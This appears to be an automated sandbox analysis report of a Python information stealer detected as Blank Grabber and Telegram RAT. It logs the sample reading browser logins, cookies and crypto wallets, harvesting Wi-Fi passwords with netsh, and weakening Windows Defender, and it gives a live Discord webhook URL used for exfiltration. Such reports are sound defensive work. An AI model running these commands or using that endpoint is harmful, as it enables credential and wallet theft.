Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B10FC590 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00007FF7B10FC590
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B1116950 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation, 0_2_00007FF7B1116950
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2F48CC GetModuleFileNameW,GetVersionExW,LoadLibraryW,LoadLibraryW, 72_2_00007FF71D2F48CC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

Stealing of Sensitive Information
barindex
Yara detected Blank Grabber
Source: Yara match File source: 00000002.00000003.1760965599.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1762531034.00000161970DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1757718097.000001619762A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1329466434.00000162E122B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1759071926.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1765429469.00000161970E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1329466434.00000162E1229000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe PID: 7600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe PID: 7656, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\_MEI76002\rarreg.key, type: DROPPED
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe PID: 7656, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Electrum
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: com.liberty.jaxx
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Ethereum
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: ereum\keystore
Tries to harvest and steal WLAN passwords
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\c7615543-0de7-4eea-9862-59688b7f430d Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\permissions.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\content-prefs.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\protections.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\webappsstore.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\ls-archive.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe PID: 7656, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Blank Grabber
Source: Yara match File source: 00000002.00000003.1760965599.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1762531034.00000161970DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1757718097.000001619762A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1329466434.00000162E122B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1759071926.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1765429469.00000161970E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1329466434.00000162E1229000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe PID: 7600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe PID: 7656, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\_MEI76002\rarreg.key, type: DROPPED
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe PID: 7656, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446241 Sample: SecuriteInfo.com.Python.Mul... Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 67 discord.com 2->67 69 ip-api.com 2->69 83 Found malware configuration 2->83 85 Antivirus detection for URL or domain 2->85 87 Antivirus / Scanner detection for submitted sample 2->87 89 13 other signatures 2->89 11 SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe 22 2->11         started        signatures3 process4 file5 55 C:\Users\user\AppData\Local\Temp\...\rar.exe, PE32+ 11->55 dropped 57 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 11->57 dropped 59 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->59 dropped 61 16 other files (none is malicious) 11->61 dropped 107 Very long command line found 11->107 109 Modifies Windows Defender protection settings 11->109 111 Adds a directory exclusion to Windows Defender 11->111 113 2 other signatures 11->113 15 SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe 1 109 11->15         started        signatures6 process7 dnsIp8 71 discord.com 162.159.135.232, 443, 49715 CLOUDFLARENETUS United States 15->71 73 ip-api.com 208.95.112.1, 49714, 80 TUT-ASUS United States 15->73 75 Very long command line found 15->75 77 Found many strings related to Crypto-Wallets (likely being stolen) 15->77 79 Tries to harvest and steal browser information (history, passwords, etc) 15->79 81 6 other signatures 15->81 19 cmd.exe 1 15->19         started        22 cmd.exe 1 15->22         started        24 cmd.exe 15->24         started        26 24 other processes 15->26 signatures9 process10 signatures11 91 Suspicious powershell command line found 19->91 93 Very long command line found 19->93 95 Encrypted powershell cmdline option found 19->95 105 2 other signatures 19->105 28 powershell.exe 23 19->28         started        31 conhost.exe 19->31         started        97 Modifies Windows Defender protection settings 22->97 99 Removes signatures from Windows Defender 22->99 33 powershell.exe 23 22->33         started        41 2 other processes 22->41 43 2 other processes 24->43 101 Adds a directory exclusion to Windows Defender 26->101 103 Tries to harvest and steal WLAN passwords 26->103 35 getmac.exe 26->35         started        37 powershell.exe 26->37         started        39 systeminfo.exe 26->39         started        46 45 other processes 26->46 process12 file13 115 Loading BitLocker PowerShell Module 33->115 117 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 35->117 119 Writes or reads registry keys via WMI 35->119 63 C:\Users\user\AppData\...\c3m2uwl3.cmdline, Unicode 43->63 dropped 48 csc.exe 43->48         started        65 C:\Users\user\AppData\Local\Temp\R9FJX.zip, RAR 46->65 dropped signatures14 process15 file16 53 C:\Users\user\AppData\Local\...\c3m2uwl3.dll, PE32 48->53 dropped 51 cvtres.exe 48->51         started        process17
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
208.95.112.1
 ip-api.com United States
53334 TUT-ASUS false
162.159.135.232
 discord.com United States
13335 CLOUDFLARENETUS true

Contacted Domains

Name IP Active
discord.com 162.159.135.232 true
ip-api.com 208.95.112.1 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://discord.com/api/webhooks/1220929699618750534/zhSTomvYGhmMHwb8qcNrPuGLmzvJ7OZ0dj098Ewa_79bqm5nvJ2v6LXEGk7f3ADrpknC true
  • Avira URL Cloud: safe
 unknown